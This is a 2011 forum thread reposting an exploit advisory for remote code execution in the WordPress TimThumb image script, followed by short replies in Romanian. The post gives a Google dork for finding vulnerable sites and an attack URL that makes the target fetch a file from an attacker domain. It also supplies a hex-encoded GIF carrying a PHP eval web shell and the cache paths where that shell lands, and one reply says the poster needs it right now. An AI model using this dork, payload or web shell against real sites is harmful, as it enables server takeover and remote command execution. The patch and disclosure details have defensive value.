LLegoLLaS Posted August 3, 2011 Report Share Posted August 3, 2011 (edited) # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com# Date: 3rd August 2011# Author: MaXe# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php# Version: 1.32# Screenshot: See attachment# Tested on: Windows XP + Apache + PHP (XAMPP)WordPress TimThumb (Theme) Plugin - Remote Code ExecutionVersions Affected:1.* - 1.32 (Only version 1.19 and 1.32 were tested.)(Version 1.33 did not save the cache file as .php)Info: (See references for original advisory)TimThumb is an image resizing utility, widely used in many WordPress themes.Links:http://www.binarymoon.co.uk/projects/timthumb/http://code.google.com/p/timthumb/Credits:- Mark Maunder (Original Researcher)- MaXe (Indepedendent Proof of Concept Writer)-:: The Advisory ::-TimThumb is prone to a Remote Code Execution vulnerability, due to thescript does not check remotely cached files properly. By crafting aspecial image file with a valid MIME-type, and appending a PHP file atthe end of this, it is possible to fool TimThumb into believing that itis a legitimate image, thus caching it locally in the cache directory.Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)[url]http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php[/url]Stored file on the Target: (This can change from host to host.)1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.PoC File:\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00(Transparent GIF + <?php @eval($_GET['cmd']) ?>-:: Solution ::-Update to the latest version 1.34 or delete the timthumb file.NOTE: This file is often renamed and you should therefore issuea command like this in a terminal: (Thanks to rAWjAW for this info.)find . | grep php | xargs grep -s timthumbDisclosure Information:- Vulnerability Disclosed (Mark Maunder): 1st August 2011- Vulnerability Researched (MaXe): 2nd August 2011- Disclosed at The Exploit Database: 3rd August 2011References:http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/http://code.google.com/p/timthumb/issues/detail?id=212http://programming.arantius.com/the+smallest+possible+gifSursa Edited August 3, 2011 by LLegoLLaS 2 Quote Link to comment Share on other sites More sharing options...
nedo Posted August 3, 2011 Report Share Posted August 3, 2011 A mai fost postat aici dar vad ca sursa e diferita si nu exista POC. Quote Link to comment Share on other sites More sharing options...
LLegoLLaS Posted August 3, 2011 Author Report Share Posted August 3, 2011 am vazut-o de-asta am postat Quote Link to comment Share on other sites More sharing options...
Nytro Posted August 3, 2011 Report Share Posted August 3, 2011 Super, chiar zilele astea as fi avut (inca am) nevoie de asa ceva, o sa revin cu un rezultat. ++ Quote Link to comment Share on other sites More sharing options...